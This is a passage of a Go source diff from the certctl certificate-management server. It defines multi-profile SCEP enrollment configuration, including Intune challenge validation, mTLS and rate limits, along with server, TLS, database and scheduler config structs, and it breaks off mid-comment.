// Legacy single-profile field; merged into Profiles[0].RAKeyPath by
|
||||||
|
// ConfigLoad when Profiles is empty.
|
||||||
|
RAKeyPath string
|
||||||
|
}
|
||||||
|
|
||||||
|
// SCEPProfileConfig is one SCEP endpoint's configuration. Each profile is
|
||||||
|
// bound to one issuer + one optional certctl CertificateProfile + one RA
|
||||||
|
// pair + one challenge password (the per-profile Intune trust anchor lands
|
||||||
|
// here in Phase 8 of the master bundle).
|
||||||
|
//
|
||||||
|
// Multi-profile motivation: a real enterprise deployment exposes distinct
|
||||||
|
// SCEP endpoints to distinct fleets — corp-laptop CA bound to one issuer
|
||||||
|
// with one challenge password; IoT CA bound to a different issuer with a
|
||||||
|
// different challenge password — so a single set of credentials can never
|
||||||
|
// enroll across CA boundaries by accident. Each SCEPProfileConfig drives
|
||||||
|
// a separate handler + service instance built at server startup.
|
||||||
|
type SCEPProfileConfig struct {
|
||||||
|
// PathID is the URL segment after /scep/. Empty string maps to the legacy
|
||||||
|
// /scep root for backward compatibility (so existing operators with the
|
||||||
|
// flat single-profile config see no URL change). Non-empty values MUST
|
||||||
|
// be a single path-safe slug ([a-z0-9-], no slashes); validated at
|
||||||
|
// startup by Config.Validate(). Multi-profile deployments typically use
|
||||||
|
// short tokens like "corp", "iot", "server" — the URL becomes
|
||||||
|
// /scep/corp, /scep/iot, /scep/server.
|
||||||
|
PathID string
|
||||||
|
|
||||||
|
// IssuerID selects which issuer connector this profile's enrollments go
|
||||||
|
// through. Must reference a configured issuer.
|
||||||
|
IssuerID string
|
||||||
|
|
||||||
|
// ProfileID optionally constrains enrollments under this PathID to a
|
||||||
|
// specific CertificateProfile. Leave empty to allow the issuer's defaults.
|
||||||
|
ProfileID string
|
||||||
|
|
||||||
|
// ChallengePassword is the per-profile shared secret. Same constant-time
|
||||||
|
// compare semantics as the flat field; empty value at validate time fails
|
||||||
|
// the boot.
|
||||||
|
ChallengePassword string
|
||||||
|
|
||||||
|
// RACertPath / RAKeyPath are the per-profile RA pair used by the RFC 8894
|
||||||
|
// EnvelopedData decryption + CertRep signing path. Same preflight semantics
|
||||||
|
// as the legacy flat fields (file existence, key mode 0600, cert/key
|
||||||
|
// match, expiry, RSA-or-ECDSA alg).
|
||||||
|
RACertPath string
|
||||||
|
RAKeyPath string
|
||||||
|
|
||||||
|
// MTLSEnabled gates the sibling `/scep-mtls/<PathID>` route. When true,
|
||||||
|
// the route requires a client cert that chains to one of the certs in
|
||||||
|
// MTLSClientCATrustBundlePath. The standard `/scep[/<PathID>]` route
|
||||||
|
// remains application-layer-auth (challenge password) so existing
|
||||||
|
// clients keep working — mTLS is additive, not replacement.
|
||||||
|
//
|
||||||
|
// SCEP RFC 8894 + Intune master bundle Phase 6.5: enterprise procurement
|
||||||
|
// teams routinely reject 'shared password authentication' as a checkbox-
|
||||||
|
// fail regardless of how strong the password is. This flag wires up a
|
||||||
|
// sibling route that adds client-cert auth at the handler layer AND keeps
|
||||||
|
// the challenge password (defense in depth, not replacement). Devices
|
||||||
|
// present a bootstrap cert from a trusted CA (e.g. a manufacturing-time
|
||||||
|
// cert), then SCEP-enroll for their long-lived cert. Same model Apple's
|
||||||
|
// MDM and Cisco's BRSKI use.
|
||||||
|
MTLSEnabled bool
|
||||||
|
|
||||||
|
// MTLSClientCATrustBundlePath is the PEM bundle of CA certs that sign
|
||||||
|
// the client (device-bootstrap) certs the operator allows to enroll.
|
||||||
|
// Required when MTLSEnabled is true. Operators with multiple bootstrap
|
||||||
|
// CAs concatenate them. Validated at startup by
|
||||||
|
// `cmd/server/main.go::preflightSCEPMTLSTrustBundle` — file exists,
|
||||||
|
// parses as PEM, contains ≥1 cert, none expired.
|
||||||
|
MTLSClientCATrustBundlePath string
|
||||||
|
|
||||||
|
// Intune is the per-profile Microsoft Intune Certificate Connector
|
||||||
|
// integration block. When Enabled is false (default), this profile only
|
||||||
|
// honors the static ChallengePassword; when true, requests with an
|
||||||
|
// Intune-shaped challenge password (length + dot-count heuristic) are
|
||||||
|
// routed to the Intune dynamic-challenge validator.
|
||||||
|
//
|
||||||
|
// SCEP RFC 8894 + Intune master bundle Phase 8.8: per-profile dispatch
|
||||||
|
// is what makes the heterogeneous-fleet story work — an operator
|
||||||
|
// running corp-laptops via Intune AND IoT devices via static challenge
|
||||||
|
// configures Intune-mode on the corp profile only; the IoT profile's
|
||||||
|
// PKCSReq path skips the Intune dispatcher entirely.
|
||||||
|
Intune SCEPIntuneProfileConfig
|
||||||
|
}
|
||||||
|
|
||||||
|
// SCEPIntuneProfileConfig is the per-profile Microsoft Intune Certificate
|
||||||
|
// Connector integration sub-block on SCEPProfileConfig.
|
||||||
|
//
|
||||||
|
// SCEP RFC 8894 + Intune master bundle Phase 8.1.
|
||||||
|
//
|
||||||
|
// All fields here are populated from CERTCTL_SCEP_PROFILE_<NAME>_INTUNE_*
|
||||||
|
// env vars (e.g. CERTCTL_SCEP_PROFILE_CORP_INTUNE_ENABLED=true). Per-profile
|
||||||
|
// overrides means an operator with two Intune-backed profiles (corp + iot,
|
||||||
|
// say) can pin distinct Connectors + audiences + rate limits per fleet.
|
||||||
|
type SCEPIntuneProfileConfig struct {
|
||||||
|
// Enabled gates the Intune dynamic-challenge validation path. When
|
||||||
|
// false (default), this profile honors only the static ChallengePassword.
|
||||||
|
// When true, ConnectorCertPath becomes a required boot gate.
|
||||||
|
Enabled bool
|
||||||
|
|
||||||
|
// ConnectorCertPath is the filesystem path to a PEM bundle of one or
|
||||||
|
// more Microsoft Intune Certificate Connector signing certs. Required
|
||||||
|
// when Enabled=true. Reloaded on SIGHUP via the per-profile
|
||||||
|
// TrustAnchorHolder wired in cmd/server/main.go.
|
||||||
|
ConnectorCertPath string
|
||||||
|
|
||||||
|
// Audience is the expected "aud" claim value in the Intune challenge —
|
||||||
|
// typically the public SCEP endpoint URL the Connector is configured to
|
||||||
|
// call (e.g. "https://certctl.example.com/scep/corp"). Defaults to
|
||||||
|
// empty (audience check disabled) for proxy / load-balancer scenarios
|
||||||
|
// where the URL the Connector saw isn't the URL we see; operators
|
||||||
|
// who pin a public URL here gain defense-in-depth against challenge
|
||||||
|
// re-use across endpoints.
|
||||||
|
Audience string
|
||||||
|
|
||||||
|
// ChallengeValidity caps the maximum age of an Intune challenge, on
|
||||||
|
// top of the challenge's own iat/exp claims. Default 60 minutes per
|
||||||
|
// Microsoft's published Connector defaults — operators may want a
|
||||||
|
// stricter cap to reduce the replay-window exposure on a stolen
|
||||||
|
// challenge. Zero means "use Connector's exp claim only" (no extra cap).
|
||||||
|
ChallengeValidity time.Duration
|
||||||
|
|
||||||
|
// PerDeviceRateLimit24h caps the number of enrollments per
|
||||||
|
// (claim.Subject, claim.Issuer) pair in any rolling 24-hour window.
|
||||||
|
// Default 3 (covers legitimate first-cert + recovery + post-wipe
|
||||||
|
// re-enrollment, blocks bulk-enumeration from a compromised Connector
|
||||||
|
// signing key). Zero means "unlimited" (defense-in-depth disabled;
|
||||||
|
// not recommended for production).
|
||||||
|
PerDeviceRateLimit24h int
|
||||||
|
|
||||||
|
// ClockSkewTolerance widens the iat/exp validation window by
|
||||||
|
// ±|tolerance| to absorb modest clock drift between the Microsoft
|
||||||
|
// Intune Certificate Connector and the certctl host. Default 60s
|
||||||
|
// per master prompt §15 ("known hazards"). Operators on tightly
|
||||||
|
// time-synced fleets can set this to zero to enforce strict
|
||||||
|
// iat/exp checks; operators on loosely synced fleets (e.g. field
|
||||||
|
// devices with no NTP) may raise to 5m. Validate() refuses any
|
||||||
|
// tolerance ≥ ChallengeValidity (which would make the per-profile
|
||||||
|
// validity cap meaningless). Source env var:
|
||||||
|
// CERTCTL_SCEP_PROFILE_<NAME>_INTUNE_CLOCK_SKEW_TOLERANCE.
|
||||||
|
ClockSkewTolerance time.Duration
|
||||||
|
}
|
||||||
|
|
||||||
|
// loadSCEPProfilesFromEnv reads the indexed CERTCTL_SCEP_PROFILES env var
|
||||||
|
// (e.g. "corp,iot,server") and expands each name into a SCEPProfileConfig
|
||||||
|
// populated from CERTCTL_SCEP_PROFILE_<NAME>_*. Returns nil when the
|
||||||
|
// CERTCTL_SCEP_PROFILES env var is unset or empty — in that case the
|
||||||
|
// legacy-shim path (mergeSCEPLegacyIntoProfiles, called from Load after the
|
||||||
|
// initial config build) populates Profiles[0] from the flat fields if needed.
|
||||||
|
//
|
||||||
|
// PathID for each profile is the lowercased trimmed name from the
|
||||||
|
// CERTCTL_SCEP_PROFILES list (e.g. "Corp" -> "corp"). Validation that the
|
||||||
|
// PathID is path-safe ([a-z0-9-]+) lives in Config.Validate() so the loader
|
||||||
|
// can stay free of error returns.
|
||||||
|
func loadSCEPProfilesFromEnv() []SCEPProfileConfig {
|
||||||
|
raw := strings.TrimSpace(os.Getenv("CERTCTL_SCEP_PROFILES"))
|
||||||
|
if raw == "" {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
names := strings.Split(raw, ",")
|
||||||
|
out := make([]SCEPProfileConfig, 0, len(names))
|
||||||
|
for _, n := range names {
|
||||||
|
n = strings.TrimSpace(n)
|
||||||
|
if n == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
// The env-var key is the upper-cased name (CERTCTL_SCEP_PROFILE_CORP_*),
|
||||||
|
// but the URL path segment is the lower-cased name to match the
|
||||||
|
// path-safe slug constraint enforced in Validate.
|
||||||
|
envName := strings.ToUpper(n)
|
||||||
|
pathID := strings.ToLower(n)
|
||||||
|
out = append(out, SCEPProfileConfig{
|
||||||
|
PathID: pathID,
|
||||||
|
IssuerID: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_ISSUER_ID", ""),
|
||||||
|
ProfileID: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_PROFILE_ID", ""),
|
||||||
|
ChallengePassword: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_CHALLENGE_PASSWORD", ""),
|
||||||
|
RACertPath: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_RA_CERT_PATH", ""),
|
||||||
|
RAKeyPath: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_RA_KEY_PATH", ""),
|
||||||
|
// SCEP RFC 8894 Phase 6.5: opt-in mTLS sibling route.
|
||||||
|
MTLSEnabled: getEnvBool("CERTCTL_SCEP_PROFILE_"+envName+"_MTLS_ENABLED", false),
|
||||||
|
MTLSClientCATrustBundlePath: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_MTLS_CLIENT_CA_TRUST_BUNDLE_PATH", ""),
|
||||||
|
// SCEP RFC 8894 Phase 8.1: per-profile Intune Connector dispatch.
|
||||||
|
Intune: SCEPIntuneProfileConfig{
|
||||||
|
Enabled: getEnvBool("CERTCTL_SCEP_PROFILE_"+envName+"_INTUNE_ENABLED", false),
|
||||||
|
ConnectorCertPath: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_INTUNE_CONNECTOR_CERT_PATH", ""),
|
||||||
|
Audience: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_INTUNE_AUDIENCE", ""),
|
||||||
|
ChallengeValidity: getEnvDuration("CERTCTL_SCEP_PROFILE_"+envName+"_INTUNE_CHALLENGE_VALIDITY", 60*time.Minute),
|
||||||
|
PerDeviceRateLimit24h: getEnvInt("CERTCTL_SCEP_PROFILE_"+envName+"_INTUNE_PER_DEVICE_RATE_LIMIT_24H", 3),
|
||||||
|
ClockSkewTolerance: getEnvDuration("CERTCTL_SCEP_PROFILE_"+envName+"_INTUNE_CLOCK_SKEW_TOLERANCE", 60*time.Second),
|
||||||
|
},
|
||||||
|
})
|
||||||
|
}
|
||||||
|
return out
|
||||||
|
}
|
||||||
|
|
||||||
|
// mergeSCEPLegacyIntoProfiles is the backward-compat shim. When Profiles is
|
||||||
|
// empty AND any legacy single-profile field is populated, synthesise a
|
||||||
|
// single-element Profiles[0] with PathID="" so /scep dispatches identically
|
||||||
|
// to the pre-Phase-1.5 deploy. No-op when Profiles is non-empty (the operator
|
||||||
|
// explicitly opted into the structured form via CERTCTL_SCEP_PROFILES) or
|
||||||
|
// when SCEP is disabled.
|
||||||
|
//
|
||||||
|
// "Any legacy field populated" means at least one of ChallengePassword,
|
||||||
|
// RACertPath, RAKeyPath is non-empty. IssuerID has a non-empty default
|
||||||
|
// ("iss-local") so it can't be the trigger; ProfileID is optional. The
|
||||||
|
// trigger set matches what the Validate() refuse cares about.
|
||||||
|
func mergeSCEPLegacyIntoProfiles(c *SCEPConfig) {
|
||||||
|
if c == nil || !c.Enabled || len(c.Profiles) > 0 {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
hasLegacy := c.ChallengePassword != "" || c.RACertPath != "" || c.RAKeyPath != ""
|
||||||
|
if !hasLegacy {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
c.Profiles = []SCEPProfileConfig{{
|
||||||
|
PathID: "", // empty pathID maps to the legacy /scep root
|
||||||
|
IssuerID: c.IssuerID,
|
||||||
|
ProfileID: c.ProfileID,
|
||||||
|
ChallengePassword: c.ChallengePassword,
|
||||||
|
RACertPath: c.RACertPath,
|
||||||
|
RAKeyPath: c.RAKeyPath,
|
||||||
|
}}
|
||||||
|
}
|
||||||
|
|
||||||
|
// validSCEPPathID reports whether s is a valid SCEP profile path segment.
|
||||||
|
// The empty string is allowed (legacy root /scep). Non-empty values must
|
||||||
|
// be ASCII lowercase letters / digits / hyphens with no leading/trailing
|
||||||
|
// hyphen — keeps URL-construction trivial at the router layer and avoids
|
||||||
|
// percent-encoding surprises for SCEP clients that build the URL by string
|
||||||
|
// concat rather than url.PathEscape.
|
||||||
|
func validSCEPPathID(s string) bool {
|
||||||
|
if s == "" {
|
||||||
|
return true // empty maps to legacy /scep root
|
||||||
|
}
|
||||||
|
if s[0] == '-' || s[len(s)-1] == '-' {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
for i := 0; i < len(s); i++ {
|
||||||
|
c := s[i]
|
||||||
|
if (c >= 'a' && c <= 'z') || (c >= '0' && c <= '9') || c == '-' {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
return true
|
||||||
|
}
|
||||||
@@ -0,0 +1,414 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
import (
|
||||||
|
"net"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 6 (2026-05-14): extracted from
|
||||||
|
// config.go. Sprint 6 groups the server-tier infrastructure structs
|
||||||
|
// — the things that configure HOW the server runs (HTTP listener,
|
||||||
|
// TLS, DB pool, scheduler loops, log level, rate limiting, CORS)
|
||||||
|
// rather than WHAT it serves (issuer configs, ACME, SCEP, EST,
|
||||||
|
// auth identity).
|
||||||
|
//
|
||||||
|
// Seven structs + one unexported helper move:
|
||||||
|
//
|
||||||
|
// ServerConfig — HTTP listener (Host, Port, MaxBodySize,
|
||||||
|
// TLS sub-struct, AuditFlushTimeoutSeconds).
|
||||||
|
// ServerTLSConfig — HTTPS-only TLS material (CertPath +
|
||||||
|
// KeyPath). HTTPS-everywhere milestone: no
|
||||||
|
// plaintext fallback, no dual-listener.
|
||||||
|
// DatabaseConfig — DB connection + pool settings + DemoSeed
|
||||||
|
// toggle for the compose demo overlay.
|
||||||
|
// SchedulerConfig — all 15 scheduler-loop tunables + the
|
||||||
|
// per-tick concurrency cap + the deploy/
|
||||||
|
// connector timeouts that ride the same
|
||||||
|
// env-var family.
|
||||||
|
// LogConfig — Level + Format (info/json defaults).
|
||||||
|
// RateLimitConfig — Bundle B / M-025: per-key token bucket
|
||||||
|
// with separate IP-keyed + user-keyed
|
||||||
|
// budgets.
|
||||||
|
// CORSConfig — AllowedOrigins (deny-by-default empty).
|
||||||
|
//
|
||||||
|
// isLoopbackAddr() — HIGH-12 demo-mode startup guard helper.
|
||||||
|
// Returns true ONLY for 127.0.0.1 / ::1 /
|
||||||
|
// "localhost"; everything else (including
|
||||||
|
// 0.0.0.0, ::, and hostnames that aren't
|
||||||
|
// "localhost") returns false. Same-package
|
||||||
|
// caller is Validate() in config.go which
|
||||||
|
// gates Type=none on non-loopback binds.
|
||||||
|
// Test caller in config_test.go is also
|
||||||
|
// package `config` so the unexported callable
|
||||||
|
// surface stays accessible.
|
||||||
|
//
|
||||||
|
// What stayed in config.go
|
||||||
|
// ========================
|
||||||
|
// - ApprovalConfig — RBAC-related (issuance-approval workflow), not
|
||||||
|
// server-tier infrastructure. Sits between SchedulerConfig and
|
||||||
|
// LogConfig in the original file ordering; Sprint 6's two-pass
|
||||||
|
// sed deliberately preserves it where it is. Candidate for a
|
||||||
|
// future Auth/RBAC follow-up cut if the operator wants the
|
||||||
|
// approval surface adjacent to AuthConfig.
|
||||||
|
// - The Validate() body that uses isLoopbackAddr to gate
|
||||||
|
// CERTCTL_AUTH_TYPE=none — cross-cutting validation logic stays
|
||||||
|
// in config.go.
|
||||||
|
// - The Load() body that synthesizes ServerConfig / ServerTLSConfig
|
||||||
|
// / DatabaseConfig / SchedulerConfig / LogConfig / RateLimitConfig
|
||||||
|
// / CORSConfig from env vars via the shared getEnv* helpers.
|
||||||
|
// - The shared getEnv* helpers (getEnv / getEnvBool / getEnvInt /
|
||||||
|
// getEnvDuration / getEnvFloat / getEnvInt64 / getEnvList).
|
||||||
|
//
|
||||||
|
// Import-graph hygiene
|
||||||
|
// ====================
|
||||||
|
// isLoopbackAddr is the ONLY user of the `net` package in config.go.
|
||||||
|
// After this move, config.go's `net` import becomes unused; the
|
||||||
|
// Sprint 6 commit removes it from config.go's import block. server.go
|
||||||
|
// imports `net` directly. The `time` import in config.go stays
|
||||||
|
// because other configs (notably ApprovalConfig isn't time-typed but
|
||||||
|
// SCEP/EST helpers in their respective .go files import their own
|
||||||
|
// `time`; config.go retains `time.Duration` uses in OCSPResponderConfig,
|
||||||
|
// DigestConfig, HealthCheckConfig, NetworkScanConfig, VerificationConfig,
|
||||||
|
// and the various issuer-specific configs that haven't been split yet).
|
||||||
|
//
|
||||||
|
// Public-surface invariant
|
||||||
|
// ========================
|
||||||
|
// Every type, exported field, and doc-comment is byte-identical to
|
||||||
|
// pre-split. Package stays `config`. Every external caller of
|
||||||
|
// `config.ServerConfig` / `config.ServerTLSConfig` / etc. resolves
|
||||||
|
// the same way. The unexported `isLoopbackAddr` is invisible to
|
||||||
|
// package consumers; its same-package caller (Validate in config.go)
|
||||||
|
// + its test (config_test.go in package `config`) continue to
|
||||||
|
// resolve via the package symbol table.
|
||||||
|
|
||||||
|
// ServerConfig contains HTTP server configuration.
|
||||||
|
type ServerConfig struct {
|
||||||
|
Host string // Server host (default: 127.0.0.1). Set via CERTCTL_SERVER_HOST.
|
||||||
|
Port int // Server port (default: 8080). Set via CERTCTL_SERVER_PORT.
|
||||||
|
MaxBodySize int64 // Maximum request body size in bytes (default: 1MB). Set via CERTCTL_MAX_BODY_SIZE.
|
||||||
|
TLS ServerTLSConfig // HTTPS-only TLS configuration. Both CertPath and KeyPath are required.
|
||||||
|
|
||||||
|
// AuditFlushTimeoutSeconds is the budget (in seconds) main.go gives the
|
||||||
|
// audit middleware to drain in-flight recordings during graceful
|
||||||
|
// shutdown. Bundle-5 / Audit M-011: pre-Bundle-5 this was hard-coded
|
||||||
|
// 30s, which dropped events silently in high-volume environments
|
||||||
|
// because the same context governed HTTP server shutdown + audit
|
||||||
|
// flush. Post-Bundle-5: configurable; default 30s preserves prior
|
||||||
|
// behaviour. WARN-log on deadline exceeded, but never exit hard.
|
||||||
|
// Setting: CERTCTL_AUDIT_FLUSH_TIMEOUT_SECONDS environment variable.
|
||||||
|
AuditFlushTimeoutSeconds int
|
||||||
|
}
|
||||||
|
|
||||||
|
// ServerTLSConfig holds the server-side TLS material.
|
||||||
|
//
|
||||||
|
// The control plane is HTTPS-only as of the HTTPS-everywhere milestone
|
||||||
|
// (§3 locked decisions: no `http` mode, no dual-listener, TLS 1.3 only).
|
||||||
|
// Both CertPath and KeyPath are required; an empty value causes
|
||||||
|
// Config.Validate() to return a fail-loud error and the server refuses
|
||||||
|
// to start. There is no plaintext HTTP fallback, no N-release migration
|
||||||
|
// bridge, and no auto-generated self-signed cert — operators either
|
||||||
|
// supply a cert on disk (docker-compose init container, operator-managed
|
||||||
|
// file, cert-manager mount) or the process exits non-zero.
|
||||||
|
type ServerTLSConfig struct {
|
||||||
|
// CertPath is the filesystem path to the server's PEM-encoded X.509
|
||||||
|
// certificate. Set via CERTCTL_SERVER_TLS_CERT_PATH. Required.
|
||||||
|
CertPath string
|
||||||
|
|
||||||
|
// KeyPath is the filesystem path to the server's PEM-encoded private
|
||||||
|
// key that signs CertPath. Set via CERTCTL_SERVER_TLS_KEY_PATH. Required.
|
||||||
|
KeyPath string
|
||||||
|
}
|
||||||
|
|
||||||
|
// DatabaseConfig contains database connection configuration.
|
||||||
|
type DatabaseConfig struct {
|
||||||
|
URL string
|
||||||
|
MaxConnections int
|
||||||
|
MigrationsPath string
|
||||||
|
|
||||||
|
// DemoSeed, when true, makes the server apply
|
||||||
|
// `<MigrationsPath>/seed_demo.sql` after the baseline `seed.sql`. Set
|
||||||
|
// via CERTCTL_DEMO_SEED. The compose demo overlay
|
||||||
|
// (deploy/docker-compose.demo.yml) sets this to keep the demo path
|
||||||
|
// alive after U-3 dropped initdb-mounted seed files. The seed file
|
||||||
|
// uses ON CONFLICT (id) DO NOTHING so re-running on a populated
|
||||||
|
// database is safe; missing-file is a no-op (returns nil) so a
|
||||||
|
// minimal-image deploy that strips seed_demo.sql still boots cleanly.
|
||||||
|
DemoSeed bool
|
||||||
|
}
|
||||||
|
|
||||||
|
// SchedulerConfig contains scheduler timing configuration.
|
||||||
|
type SchedulerConfig struct {
|
||||||
|
// RenewalCheckInterval is how often the renewal scheduler checks for expiring certs.
|
||||||
|
// Default: 1 hour. Minimum: 1 minute. Certs are flagged for renewal at configured thresholds.
|
||||||
|
// Setting: CERTCTL_SCHEDULER_RENEWAL_CHECK_INTERVAL environment variable.
|
||||||
|
RenewalCheckInterval time.Duration
|
||||||
|
|
||||||
|
// JobProcessorInterval is how often the job scheduler processes pending jobs.
|
||||||
|
// Default: 30 seconds. Minimum: 1 second. Controls issuance, renewal, and deployment latency.
|
||||||
|
// Setting: CERTCTL_SCHEDULER_JOB_PROCESSOR_INTERVAL environment variable.
|
||||||
|
JobProcessorInterval time.Duration
|
||||||
|
|
||||||
|
// RenewalConcurrency caps the number of concurrent renewal/issuance/
|
||||||
|
// deployment goroutines launched per job-processor tick. Default 25 —
|
||||||
|
// high enough to make use of HTTP/1.1 connection reuse against an
|
||||||
|
// upstream CA, low enough to stay under typical per-customer rate
|
||||||
|
// limits. Operators with permissive upstream limits and large fleets
|
||||||
|
// (>10k certs) can bump to 100; operators with strict limits or
|
||||||
|
// async-CA-heavy fleets should keep at 25 or lower.
|
||||||
|
//
|
||||||
|
// Values ≤ 0 fall back to 1 (sequential) — fail-safe rather than
|
||||||
|
// panicking on semaphore.NewWeighted(0) semantics.
|
||||||
|
//
|
||||||
|
// Closes the #9 acquisition-readiness blocker from the 2026-05-01
|
||||||
|
// issuer coverage audit. Pre-fix the per-tick fan-out had no cap,
|
||||||
|
// so a 5k-cert sweep launched 5k in-flight HTTP calls to upstream
|
||||||
|
// CAs and tripped DigiCert/Entrust/Sectigo rate limits.
|
||||||
|
//
|
||||||
|
// Setting: CERTCTL_RENEWAL_CONCURRENCY environment variable.
|
||||||
|
RenewalConcurrency int
|
||||||
|
|
||||||
|
// AgentHealthCheckInterval is how often the scheduler checks agent heartbeats.
|
||||||
|
// Default: 2 minutes. Minimum: 1 second. Marks agents offline if no recent heartbeat.
|
||||||
|
// Setting: CERTCTL_SCHEDULER_AGENT_HEALTH_CHECK_INTERVAL environment variable.
|
||||||
|
AgentHealthCheckInterval time.Duration
|
||||||
|
|
||||||
|
// NotificationProcessInterval is how often the scheduler processes pending notifications.
|
||||||
|
// Default: 1 minute. Minimum: 1 second. Sends notifications to Slack, Teams, PagerDuty, etc.
|
||||||
|
// Setting: CERTCTL_SCHEDULER_NOTIFICATION_PROCESS_INTERVAL environment variable.
|
||||||
|
NotificationProcessInterval time.Duration
|
||||||
|
|
||||||
|
// NotificationRetryInterval is how often the scheduler retries failed
|
||||||
|
// notifications whose retry_count is below the service-layer 5-attempt
|
||||||
|
// DLQ budget. Default: 2 minutes. Minimum: 1 second. Mirrors the I-001
|
||||||
|
// RetryInterval knob: transitions eligible Failed notifications whose
|
||||||
|
// next_retry_at has arrived back to Pending so the notification processor
|
||||||
|
// picks them up on its next tick (closes coverage gap I-005 — HEAD had
|
||||||
|
// no retry path for transient SMTP/webhook failures and notifications
|
||||||
|
// stayed Failed forever).
|
||||||
|
// Setting: CERTCTL_NOTIFICATION_RETRY_INTERVAL environment variable.
|
||||||
|
NotificationRetryInterval time.Duration
|
||||||
|
|
||||||
|
// RetryInterval is how often the scheduler retries failed jobs whose Attempts
|
||||||
|
// counter is below MaxAttempts. Default: 5 minutes. Minimum: 1 second.
|
||||||
|
// Transitions eligible Failed jobs back to Pending so the job processor can
|
||||||
|
// pick them up again (closes coverage gap I-001 — JobService.RetryFailedJobs
|
||||||
|
// had no caller prior to this loop being wired).
|
||||||
|
// Setting: CERTCTL_SCHEDULER_RETRY_INTERVAL environment variable.
|
||||||
|
RetryInterval time.Duration
|
||||||
|
|
||||||
|
// JobTimeoutInterval is how often the reaper loop sweeps AwaitingCSR and
|
||||||
|
// AwaitingApproval jobs for TTL expiration. Default: 10 minutes. Minimum: 1
|
||||||
|
// second. Timed-out jobs are transitioned to Failed with a descriptive error
|
||||||
|
// message; I-001's retry loop then auto-promotes eligible Failed jobs back
|
||||||
|
// to Pending (closes coverage gap I-003).
|
||||||
|
// Setting: CERTCTL_JOB_TIMEOUT_INTERVAL environment variable.
|
||||||
|
JobTimeoutInterval time.Duration
|
||||||
|
|
||||||
|
// AwaitingCSRTimeout is the maximum age an AwaitingCSR job can remain in
|
||||||
|
// that state before the reaper transitions it to Failed. Default: 24 hours.
|
||||||
|
// An agent that hasn't submitted a CSR within this window is presumed
|
||||||
|
// unreachable. Minimum: 1 second.
|
||||||
|
// Setting: CERTCTL_JOB_AWAITING_CSR_TIMEOUT environment variable.
|
||||||
|
AwaitingCSRTimeout time.Duration
|
||||||
|
|
||||||
|
// AwaitingApprovalTimeout is the maximum age an AwaitingApproval job can
|
||||||
|
// remain in that state before the reaper transitions it to Failed. Default:
|
||||||
|
// 168 hours (7 days). Reviewers who haven't approved within this window
|
||||||
|
// force the renewal to fail loudly rather than silently stall. Minimum: 1
|
||||||
|
// second.
|
||||||
|
// Setting: CERTCTL_JOB_AWAITING_APPROVAL_TIMEOUT environment variable.
|
||||||
|
AwaitingApprovalTimeout time.Duration
|
||||||
|
|
||||||
|
// ShortLivedExpiryCheckInterval is how often the scheduler scans
|
||||||
|
// short-lived certificates and marks expired rows as Expired. Default:
|
||||||
|
// 30 seconds (matches the in-memory default in scheduler.NewScheduler).
|
||||||
|
// C-1 closure (cat-g-7e38f9708e20 + diff-10xmain-2bf4a0a60388):
|
||||||
|
// pre-C-1 the setter scheduler.SetShortLivedExpiryCheckInterval was
|
||||||
|
// defined + tested but never called from cmd/server/main.go, so the
|
||||||
|
// 30-second default was effectively hardcoded. Operators who needed
|
||||||
|
// to tune the cadence (e.g. a high-churn short-lived cert tenant)
|
||||||
|
// had no path. Post-C-1 main.go wires this knob.
|
||||||
|
// Setting: CERTCTL_SHORT_LIVED_EXPIRY_CHECK_INTERVAL environment variable.
|
||||||
|
ShortLivedExpiryCheckInterval time.Duration
|
||||||
|
|
||||||
|
// CRLGenerationInterval is how often the scheduler pre-generates
|
||||||
|
// CRLs into the crl_cache table. The /.well-known/pki/crl/{issuer_id}
|
||||||
|
// HTTP endpoint reads from this cache instead of regenerating per
|
||||||
|
// request. Default: 1 hour.
|
||||||
|
// Setting: CERTCTL_CRL_GENERATION_INTERVAL environment variable.
|
||||||
|
// Bundle CRL/OCSP-Responder Phase 3.
|
||||||
|
CRLGenerationInterval time.Duration
|
||||||
|
|
||||||
|
// OCSPRateLimitPerIPMin is the per-source-IP cap on OCSP requests
|
||||||
|
// per minute. Defaults to 1000 (production hardening II Phase 3
|
||||||
|
// frozen decision 0.5). Zero disables the limit.
|
||||||
|
// Setting: CERTCTL_OCSP_RATE_LIMIT_PER_IP_MIN environment variable.
|
||||||
|
OCSPRateLimitPerIPMin int
|
||||||
|
|
||||||
|
// CertExportRateLimitPerActorHr is the per-actor cap on cert-export
|
||||||
|
// requests per hour. Defaults to 50 (production hardening II Phase
|
||||||
|
// 3 frozen decision 0.6). Zero disables the limit.
|
||||||
|
// Setting: CERTCTL_CERT_EXPORT_RATE_LIMIT_PER_ACTOR_HR environment variable.
|
||||||
|
CertExportRateLimitPerActorHr int
|
||||||
|
|
||||||
|
// DeployBackupRetention is the default backup retention applied
|
||||||
|
// to every connector's deploy.Plan when the per-target config
|
||||||
|
// doesn't override. Defaults to 3 (deploy-hardening I frozen
|
||||||
|
// decision 0.2). Set to -1 to disable backups entirely (rollback
|
||||||
|
// becomes impossible — documented foot-gun).
|
||||||
|
// Setting: CERTCTL_DEPLOY_BACKUP_RETENTION environment variable.
|
||||||
|
DeployBackupRetention int
|
||||||
|
|
||||||
|
// K8sDeployKubeletSyncTimeout is how long the k8ssecret connector
|
||||||
|
// waits for kubelet sync (Pod.Status.ContainerStatuses indicating
|
||||||
|
// the new Secret has been mounted) after a Secret update before
|
||||||
|
// timing out the post-deploy verify. Defaults to 60s.
|
||||||
|
